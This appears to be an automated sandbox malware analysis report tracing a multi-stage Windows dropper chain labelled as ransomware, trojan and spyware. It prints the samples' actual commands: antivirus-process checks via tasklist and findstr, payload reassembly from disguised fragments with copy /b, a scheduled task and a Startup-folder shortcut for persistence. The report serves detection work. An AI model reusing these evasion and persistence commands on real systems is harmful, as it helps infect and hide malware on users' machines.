Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\FilenameWho
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | File created: C:\Windows\UpdatedMakeup
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA3BA2
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00923BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00925C9E
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Code function: 16_2_0077E57A
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D601E07
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606528
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6065EC
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D60658C
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606458
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D60642C
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6014F2
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6064CC
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606494
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D60649C
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606634
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606618
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6066E4
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6066D4
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6061CC
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6061D0
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6061DC
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606264
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606268
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606274
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606278
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D60625C
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D6062D4
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606284
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_6D606298
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe 87618787E1032BBF6A6CA8B3388EA3803BE20A49E4AFABA1DF38A6116085062F
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: String function: 6D63E6CF appears 38 times
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: String function: 6D63E69B appears 123 times
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 800
                              Source: mQRr8Rkorf.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 5562886 bytes, 2 files, at 0x2c +A "A7B94.exe" +A "3E11p.exe", ID 1361, number 1, 173 datablocks, 0x1503 compression
                              Source: A7B94.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 3654106 bytes, 2 files, at 0x2c +A "1E08u3.exe" +A "2R0700.exe", ID 1457, number 1, 158 datablocks, 0x1503 compression
Source: HmngBpR[1].exe.9.dr | Static PE information: Number of sections : 11 > 10
Source: HmngBpR.exe.9.dr | Static PE information: Number of sections : 11 > 10
Source: uvwnwebboksg.51.dr | Static PE information: No import functions for PE file found
Source: han.19.dr | Static PE information: No import functions for PE file found
Source: mQRr8Rkorf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: pwHxMTy[1].exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pwHxMTy.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: T0QdO0l[1].exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: T0QdO0l.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3E11p.exe.0.dr | Static PE information: Section: xsbgiknq ZLIB complexity 0.9949813356419422
Source: 1E08u3.exe.1.dr | Static PE information: Section: ZLIB complexity 0.9986925361570248
Source: 1E08u3.exe.1.dr | Static PE information: Section: ezfgyvbn ZLIB complexity 0.9944717796641244
Source: rapes.exe.2.dr | Static PE information: Section: ZLIB complexity 0.9986925361570248
Source: rapes.exe.2.dr | Static PE information: Section: ezfgyvbn ZLIB complexity 0.9944717796641244
Source: bncn6rv.exe.9.dr | Static PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
Source: pwHxMTy[1].exe.9.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003264200621547
Source: pwHxMTy.exe.9.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003264200621547
Source: ADFoyxP[1].exe.9.dr | Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: ADFoyxP.exe.9.dr | Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: bncn6rv[1].exe.9.dr | Static PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
Source: T0QdO0l[1].exe.9.dr, ConcreteRole.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: T0QdO0l.exe.9.dr, ConcreteRole.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@80/108@11/8
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00921F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\HmngBpR[1].exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1920:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4056
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Command line argument: Kernel32.dll (0_2_00FA2BFB)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Command line argument: Kernel32.dll (1_2_00922BFB)
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Command line argument: AnyViewer (17_2_009F19D0)
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Command line argument: p#nvpmv (17_2_009F19D0)
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Command line argument: pmv (17_2_009F19D0)
Source: mQRr8Rkorf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Source: 2R0700.exe, 00000005.00000003.1029106070.0000000005457000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1028439756.0000000005482000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.999508918.0000000005478000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.998805722.00000000054A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: mQRr8Rkorf.exe | Virustotal: Detection: 65%
Source: mQRr8Rkorf.exe | ReversingLabs: Detection: 55%
Source: 1E08u3.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 1E08u3.exe | String found in binary or memory: " /add /y
Source: 1E08u3.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: " /add /y
Source: unknown | Process created: C:\Users\user\Desktop\mQRr8Rkorf.exe "C:\Users\user\Desktop\mQRr8Rkorf.exe"
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe"
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Process created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Process created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe"
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Process created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe "C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe"
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 800
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Process created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Process created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Process created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
